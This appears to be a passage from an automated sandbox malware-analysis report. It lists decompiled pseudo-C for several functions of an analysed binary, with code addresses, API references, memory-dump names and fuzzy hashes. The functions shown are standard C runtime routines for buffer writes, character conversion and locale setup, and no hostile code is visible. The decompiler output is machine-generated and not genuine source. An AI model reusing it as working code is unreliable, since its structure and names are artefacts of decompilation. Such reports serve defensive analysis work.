										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E004243CB(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E004224A0( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00425667(_t100))) = 0x16;
					E00428965();
					goto L4;
				}
			}

0x00424727
0x0042472c
0x0042474b
0x00000000
0x00424734
0x00424734
0x00424737
0x00424739
0x00424752
0x00424755
0x00424757
0x00000000
0x00000000
0x00424759
0x0042475e
0x00424760
0x00424763
0x00000000
0x00000000
0x00424765
0x00424769
0x00424770
0x00424773
0x00424776
0x00424778
0x00424782
0x0042477a
0x0042477d
0x0042477d
0x00424789
0x0042478b
0x00424850
0x00000000
0x00424791
0x00424791
0x00424794
0x00424794
0x0042479a
0x004247cb
0x004247cb
0x004247ce
0x00424827
0x0042482e
0x00424831
0x0042485c
0x0042485c
0x0042485e
0x00000000
0x00424862
0x00424833
0x00424836
0x00424839
0x0042483a
0x0042483d
0x0042483f
0x00424841
0x00424841
0x00000000
0x0042483f
0x004247d0
0x004247d2
0x004247df
0x004247df
0x004247e3
0x004247e5
0x004247e9
0x004247eb
0x004247ee
0x004247ee
0x004247ee
0x004247f0
0x004247f1
0x004247fb
0x004247fc
0x00424801
0x00424804
0x00424807
0x0042486a
0x0042486a
0x0042486e
0x00000000
0x00424809
0x00424809
0x0042480b
0x0042480d
0x0042480f
0x0042480f
0x00424811
0x00424814
0x00424816
0x00424818
0x00000000
0x0042481a
0x0042481a
0x0042481a
0x00000000
0x0042481a
0x00424818
0x00424807
0x004247d5
0x004247db
0x004247dd
0x00000000
0x00000000
0x00000000
0x004247dd
0x0042479c
0x0042479f
0x004247a1
0x00000000
0x00000000
0x004247a3
0x00424858
0x00424858
0x00424858
0x00000000
0x00424858
0x004247a9
0x004247ab
0x004247ad
0x004247af
0x004247af
0x004247b7
0x004247bc
0x004247bf
0x004247c1
0x004247c4
0x004247c6
0x00000000
0x00424848
0x00424848
0x00424848
0x00000000
0x00424791
0x0042478b
0x0042473b
0x00424740
0x00424746
0x00000000
0x00424746

APIs

_memmove.LIBCMT ref: 004247B7
__flush.LIBCMT ref: 004247D5
__write.LIBCMT ref: 004247FC
__flsbuf.LIBCMT ref: 00424827

Part of subcall function 00425667: __getptd_noexit.LIBCMT ref: 00425667

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 7701a205f378f2baeac8b4773a6aeee9ae653d50f0f823bc68fc425f8c33c3cf
Instruction ID: 58c11fbd616f23c627196b1a6fccd2f9fd00d14efc0251b84ea8e1495dfc1299
Opcode Fuzzy Hash: 7701a205f378f2baeac8b4773a6aeee9ae653d50f0f823bc68fc425f8c33c3cf
Instruction Fuzzy Hash: 1C413635B006649BCB249F69E880AAFBBB1EFC1360F64852FE42597240D778DE41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00419CB0 Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419CB0(intOrPtr __ecx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12, signed short** _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v24;
				intOrPtr _v28;
				void* __ebp;
				intOrPtr _t63;
				intOrPtr _t75;
				void* _t79;
				intOrPtr _t99;
				intOrPtr _t112;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_v28 = __ecx;
				 *_a16 = _a8;
				 *_a28 = _a20;
				_v12 = 0 |  *_a16 != _a12;
				while( *_a16 != _a12) {
					_t127 =  *_a28 - _a24;
					if( *_a28 == _a24) {
						break;
					}
					if(E0042543D(_t79, _t120, _t121, _t127) > _a24 -  *_a28) {
						_v16 =  *_a4;
						_t63 = E0040D859( &_v24,  *( *_a16) & 0x0000ffff, _a4, _v28 + 8);
						_t123 = _t122 + 0x10;
						_v8 = _t63;
						__eflags = _v8;
						if(_v8 >= 0) {
							__eflags = _a24 -  *_a28 - _v8;
							if(_a24 -  *_a28 >= _v8) {
								E004224A0( *_a28,  &_v24, _v8);
								_t122 = _t123 + 0xc;
								 *_a16 =  &(( *_a16)[1]);
								_t112 =  *_a28 + _v8;
								__eflags = _t112;
								 *_a28 = _t112;
								_v12 = 0;
								L13:
								continue;
							}
							 *_a4 = _v16;
							return _v12;
						}
						return 2;
					}
					_t75 = E0040D859( *_a28,  *( *_a16) & 0x0000ffff, _a4, _v28 + 8);
					_t122 = _t122 + 0x10;
					_v8 = _t75;
					if(_v8 >= 0) {
						 *_a16 =  &(( *_a16)[1]);
						_t99 =  *_a28 + _v8;
						__eflags = _t99;
						 *_a28 = _t99;
						_v12 = 0;
						goto L13;
					}
					return 2;
				}
				return _v12;
			}

0x00419cb6
0x00419cbf
0x00419cc7
0x00419cd6
0x00419cd9
0x00419cec
0x00419cef
0x00000000
0x00000000
0x00419d04
0x00419d68
0x00419d83
0x00419d88
0x00419d8b
0x00419d8e
0x00419d92
0x00419da5
0x00419da8
0x00419dc7
0x00419dcc
0x00419dda
0x00419de1
0x00419de1
0x00419de7
0x00419de9
0x00419df0
0x00000000
0x00419df0
0x00419db0
0x00000000
0x00419db2
0x00000000
0x00419d94
0x00419d20
0x00419d25
0x00419d28
0x00419d2f
0x00419d48
0x00419d4f
0x00419d4f
0x00419d55
0x00419d57
0x00000000
0x00419d5e
0x00000000
0x00419d31
0x00000000

APIs

____mb_cur_max_func.LIBCMT ref: 00419CF5

Part of subcall function 0042543D: __getptd.LIBCMT ref: 0042543D

__Wcrtomb.LIBCPMT ref: 00419D20

Part of subcall function 0040D859: ____lc_handle_func.LIBCMT ref: 0040D867
Part of subcall function 0040D859: ____lc_codepage_func.LIBCMT ref: 0040D86F

__Wcrtomb.LIBCPMT ref: 00419D83

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Wcrtomb$____lc_codepage_func____lc_handle_func____mb_cur_max_func__getptd
String ID:
API String ID: 1042824685-0
Opcode ID: 799963a10f8ae9ee17b2861fb41532a96cacc029b85cd0352b6a5595c1e01396
Instruction ID: 5001bfeafb1c4b52e28fa2e726f1cae7c405e099a558253aec744060b48f9a13
Opcode Fuzzy Hash: 799963a10f8ae9ee17b2861fb41532a96cacc029b85cd0352b6a5595c1e01396
Instruction Fuzzy Hash: 5651E5B5600109DFCB04DF58D591AEEB7B2FF89304F208199E805AB354D738AD91DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00434477 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00434477(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00423310(0,  &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00431C9D( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00425667(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x50036ad0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x50036ad0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x50036ad0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00434481
0x00434488
0x0043449f
0x00000000
0x0043448f
0x00434491
0x004344ab
0x004344b0
0x004344b3
0x004344b6
0x004344de
0x004344e5
0x004344e7
0x00434568
0x0043457a
0x00434583
0x00434585
0x004344c5
0x004344c5
0x004344c8
0x004344ca
0x004344cd
0x004344cd
0x004344cd
0x004344cd
0x00000000
0x004344d3
0x00434547
0x00434547
0x0043454c
0x00434552
0x00434555
0x00434557
0x0043455a
0x0043455a
0x0043455a
0x0043455a
0x00000000
0x0043455e
0x004344e9
0x004344ec
0x004344ec
0x004344f2
0x004344f5
0x0043451c
0x0043451f
0x0043451f
0x00434525
0x00000000
0x00000000
0x00434527
0x0043452a
0x00000000
0x00000000
0x0043452c
0x0043452c
0x0043452c
0x00434532
0x00434535
0x004344a4
0x004344a4
0x0043453e
0x00000000
0x0043453e
0x004344f7
0x004344fa
0x00000000
0x00000000
0x004344fe
0x0043450c
0x0043450f
0x00434515
0x00434517
0x0043451a
0x00000000
0x00000000
0x00000000
0x0043451a
0x004344b8
0x004344bb
0x004344bd
0x004344c2
0x004344c2
0x00000000
0x00434493
0x00434493
0x00434498
0x0043449c
0x0043449c
0x00000000
0x00434498
0x00434491

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004344AB
__isleadbyte_l.LIBCMT ref: 004344DE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,00435DBA,00000109,00BFBBEF,00000003), ref: 0043450F
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00435DBA,00000109,00BFBBEF,00000003), ref: 0043457D

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: faeb0ad3f567190cdafc54c192caf6fd4826f9a5872f79b2b35494dc76dcf9f1
Instruction ID: 830a6b33db86159f6f89e58baa39e566cc1a9dc93b9c72c315234311c0fdd7e7
Opcode Fuzzy Hash: faeb0ad3f567190cdafc54c192caf6fd4826f9a5872f79b2b35494dc76dcf9f1
Instruction Fuzzy Hash: 3831F330A00255EFDB20CF64C880AFE3BB5AF89321F1455BAE5658B291D734ED40DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1A0 Relevance: 6.1, APIs: 4, Instructions: 81
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041E1A0(void* __edi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a40) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v36;
				char _v48;
				intOrPtr _v52;
				char _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t68;
				intOrPtr _t69;
				void* _t76;

				_t76 = __eflags;
				_push(0xffffffff);
				_push(E0044F118);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_v8 = 0;
				_push(_a40);
				_t71 = _t69 - 0x38;
				_v52 = _t69 - 0x38;
				_v96 = E00404800(_t71,  &_a12);
				_push(_a8);
				_push( &_v64);
				_v100 = E0041E040( &_v64,  &_a12, __edi);
				E004215C0(E004215A0( &_v48,  &_v24,  &_v20), _t76, _v100);
				E00420BE0( &_v36);
				_t77 = _v20;
				if(_v20 == 0) {
					E00420C00( &_v36, __eflags, E00421580( &_v88, 0, 0));
				} else {
					E00420C00( &_v36, _t77, E00420310( &_v76, __edi, _t68, _t77, __fp0,  &_v76, _v24, _v20));
				}
				_v92 = _v20;
				_push(_v92);
				E00422493();
				E004215F0(_a4,  &_v36);
				_v8 = 0xffffffff;
				E004034C0( &_a12);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x0041e1a0
0x0041e1a3
0x0041e1a5
0x0041e1b0
0x0041e1b1
0x0041e1bb
0x0041e1c5
0x0041e1c6
0x0041e1cb
0x0041e1d7
0x0041e1dd
0x0041e1e1
0x0041e1ea
0x0041e207
0x0041e20f
0x0041e214
0x0041e218
0x0041e24d
0x0041e21a
0x0041e232
0x0041e232
0x0041e255
0x0041e25b
0x0041e25c
0x0041e26b
0x0041e270
0x0041e27a
0x0041e285
0x0041e28f

APIs

Part of subcall function 0041E040: codecvt.LIBCPMTD ref: 0041E11B

shared_ptr.LIBCMTD ref: 0041E207

Part of subcall function 00420BE0: Concurrency::details::_Condition_variable::_Condition_variable.LIBCMTD ref: 00420BEA

shared_ptr.LIBCMTD ref: 0041E232
shared_ptr.LIBCMTD ref: 0041E24D
_DebugHeapAllocator.LIBCPMTD ref: 0041E26B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: shared_ptr$AllocatorConcurrency::details::_Condition_variableCondition_variable::_DebugHeapcodecvt
String ID:
API String ID: 2399777932-0
Opcode ID: c5fd0d48dc14b638360ed497fc609f1f64dac347587a04a32347e4af84964422
Instruction ID: 93d7416fc3c80a84733108504a953031af7d09d9883ef57fd24bc946864c4732
Opcode Fuzzy Hash: c5fd0d48dc14b638360ed497fc609f1f64dac347587a04a32347e4af84964422
Instruction Fuzzy Hash: 2A3166B6D00218ABCB04EFD5DC41EEEB778BF48714F44461EF51567281EB389504CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419210 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;

				_v24 = __ecx;
				E004115B0(_v24,  &_v8, _a8);
				E004115B0(_v24,  &_v12, _a12);
				if((E00420BB0( &_v8, __eflags,  &_v12) & 0x000000ff) != 0) {
					_v16 = E0041C020(_v24, _v12,  *((intOrPtr*)(_v24 + 4)), _v8);
					E0041B140(_v24, _v16,  *((intOrPtr*)(_v24 + 4)));
					 *((intOrPtr*)(_v24 + 4)) = _v16;
				}
				_v20 = _v8;
				E004115B0(_v24, _a4, _v20);
				return _a4;
			}

0x00419216
0x00419224
0x00419234
0x0041924a
0x00419263
0x00419274
0x0041927f
0x0041927f
0x00419285
0x00419293
0x0041929e

APIs

std::error_category::default_error_condition.LIBCPMTD ref: 00419224
std::error_category::default_error_condition.LIBCPMTD ref: 00419234
_Copy_impl.LIBCPMTD ref: 0041925B
std::error_category::default_error_condition.LIBCPMTD ref: 00419293

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::error_category::default_error_condition$Copy_impl
String ID:
API String ID: 1565055843-0
Opcode ID: d2b52200e79fba28b811b5c43db67a12cb952a4b122c164ee6b68035a4770eb9
Instruction ID: 382bae336875b80b803825c59d7aed26769329c7ea02efe740fe3796cc4b938d
Opcode Fuzzy Hash: d2b52200e79fba28b811b5c43db67a12cb952a4b122c164ee6b68035a4770eb9
Instruction Fuzzy Hash: 4011DAB5A00109FBCB04DFD9C991CEFB7BAAF88304B20815DA505A7351DA30AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00411210 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _t32;

				_v24 = __ecx;
				E004115B0(_v24,  &_v8, _a8);
				E004115B0(_v24,  &_v12, _a12);
				_t32 = E00420BB0( &_v8, __eflags,  &_v12);
				_t62 = _t32 & 0x000000ff;
				if((_t32 & 0x000000ff) != 0) {
					_v16 = E00411E20(_v24, _t62, _v12,  *((intOrPtr*)(_v24 + 4)), _v8);
					E004115D0(_v24, _v16,  *((intOrPtr*)(_v24 + 4)));
					 *((intOrPtr*)(_v24 + 4)) = _v16;
				}
				_v20 = _v8;
				E004115B0(_v24, _a4, _v20);
				return _a4;
			}

0x00411216
0x00411224
0x00411234
0x00411240
0x00411248
0x0041124a
0x00411263
0x00411274
0x0041127f
0x0041127f
0x00411285
0x00411293
0x0041129e

APIs

std::error_category::default_error_condition.LIBCPMTD ref: 00411224
std::error_category::default_error_condition.LIBCPMTD ref: 00411234
_Copy_impl.LIBCPMTD ref: 0041125B

Part of subcall function 00411E20: _Copy_impl.LIBCPMTD ref: 00411E48

std::error_category::default_error_condition.LIBCPMTD ref: 00411293

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::error_category::default_error_condition$Copy_impl
String ID:
API String ID: 1565055843-0
Opcode ID: 28669853f932588f973ff60ea778ec7510dc44e41b37ee9e1b88957c52ba35e4
Instruction ID: 1dfca4f0a9646b899cf667e1ba0fe2b867815291981b1bbdb87af8590ee95375
Opcode Fuzzy Hash: 28669853f932588f973ff60ea778ec7510dc44e41b37ee9e1b88957c52ba35e4
Instruction Fuzzy Hash: 3B11ADB5A00109FBCB04DFD9C991CEFB7BAAF88304B14815DA605A7351DA35AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004125B0 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004125B0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _t32;

				_v24 = __ecx;
				E00412650(_v24,  &_v8, _a8);
				E00412650(_v24,  &_v12, _a12);
				_t32 = E00403390( &_v8,  &_v12);
				_t62 = _t32 & 0x000000ff;
				if((_t32 & 0x000000ff) != 0) {
					_v16 = E004127C0(_v24, _t62, _v12,  *((intOrPtr*)(_v24 + 4)), _v8);
					E00402E70(_v16, _v16,  *((intOrPtr*)(_v24 + 4)));
					 *((intOrPtr*)(_v24 + 4)) = _v16;
				}
				_v20 = _v8;
				E00412650(_v24, _a4, _v20);
				return _a4;
			}

0x004125b6
0x004125c4
0x004125d4
0x004125e0
0x004125e8
0x004125ea
0x00412603
0x00412614
0x0041261f
0x0041261f
0x00412625
0x00412633
0x0041263e

APIs

std::error_category::default_error_condition.LIBCPMTD ref: 004125C4
std::error_category::default_error_condition.LIBCPMTD ref: 004125D4
_Copy_impl.LIBCPMTD ref: 004125FB

Part of subcall function 004127C0: _Copy_impl.LIBCPMTD ref: 004127E8

std::error_category::default_error_condition.LIBCPMTD ref: 00412633

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::error_category::default_error_condition$Copy_impl
String ID:
API String ID: 1565055843-0
Opcode ID: 2eb0e9fed66ce1911b974029f02737154a11fa7e8514b60281dfaec4f1e93598
Instruction ID: ccade8218a27acd9e39d90273ce8f926e398911600fc0173d381d4bcd00a0b51
Opcode Fuzzy Hash: 2eb0e9fed66ce1911b974029f02737154a11fa7e8514b60281dfaec4f1e93598
Instruction Fuzzy Hash: F711EFB5D00009ABCB04DFD9CA91CEFB7B9AF98304B10815DA519A7381DA30AE11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00418F60 Relevance: 6.1, APIs: 4, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00418F60(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _t32;

				_v24 = __ecx;
				E004115B0(_v24,  &_v8, _a8);
				E004115B0(_v24,  &_v12, _a12);
				_t32 = E00420BB0( &_v8, __eflags,  &_v12);
				_t62 = _t32 & 0x000000ff;
				if((_t32 & 0x000000ff) != 0) {
					_v16 = E0041BFE0(_v24, _t62, _v12,  *((intOrPtr*)(_v24 + 4)), _v8);
					E004115D0(_v24, _v16,  *((intOrPtr*)(_v24 + 4)));
					 *((intOrPtr*)(_v24 + 4)) = _v16;
				}
				_v20 = _v8;
				E004115B0(_v24, _a4, _v20);
				return _a4;
			}

0x00418f66
0x00418f74
0x00418f84
0x00418f90
0x00418f98
0x00418f9a
0x00418fb3
0x00418fc4
0x00418fcf
0x00418fcf
0x00418fd5
0x00418fe3
0x00418fee

APIs

std::error_category::default_error_condition.LIBCPMTD ref: 00418F74
std::error_category::default_error_condition.LIBCPMTD ref: 00418F84
_Copy_impl.LIBCPMTD ref: 00418FAB
std::error_category::default_error_condition.LIBCPMTD ref: 00418FE3

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::error_category::default_error_condition$Copy_impl
String ID:
API String ID: 1565055843-0
Opcode ID: 9ce8fbe9ab282af14e719d96c12ad301a8f1eea2c1ee5b8a4910548bfa8de71d
Instruction ID: 1adc223110f38278595dce065ccb91f729e43826b418cbf60a339e50613fc717
Opcode Fuzzy Hash: 9ce8fbe9ab282af14e719d96c12ad301a8f1eea2c1ee5b8a4910548bfa8de71d
Instruction Fuzzy Hash: 7D11ADB5A00109EBCB04DFD9C991CEFB7BAAF88304B14815DB505A7351DA35AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004028F0 Relevance: 6.1, APIs: 4, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E004028F0(char __ecx, char* _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v24;
				char _v28;
				void* __ebx;
				void* __esi;
				signed int _t21;
				intOrPtr _t25;
				void* _t38;
				char _t40;
				void* _t42;

				_push(0xffffffff);
				_push(E0044DA24);
				_push( *[fs:0x0]);
				_t21 =  *0x4608e0; // 0xb51ec2b3
				_push(_t21 ^ _t42 - 0x00000010);
				 *[fs:0x0] =  &_v12;
				_t40 = __ecx;
				_v28 = __ecx;
				E0040D950(__ecx, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((char*)(__ecx + 0x20)) = 0;
				_t25 = _v0;
				_v8 = 4;
				_t46 = _t25;
				if(_t25 == 0) {
					_a4 = "bad locale name";
					E00422354( &_v24,  &_a4);
					_v28 = 0x451450;
					_t25 = E00422CB4( &_v28, 0x459660);
				}
				E0040DB6C(0, _t38, _t40, _t46, _t40, _t25);
				 *[fs:0x0] = _v12;
				return _t40;
			}

0x004028f0
0x004028f2
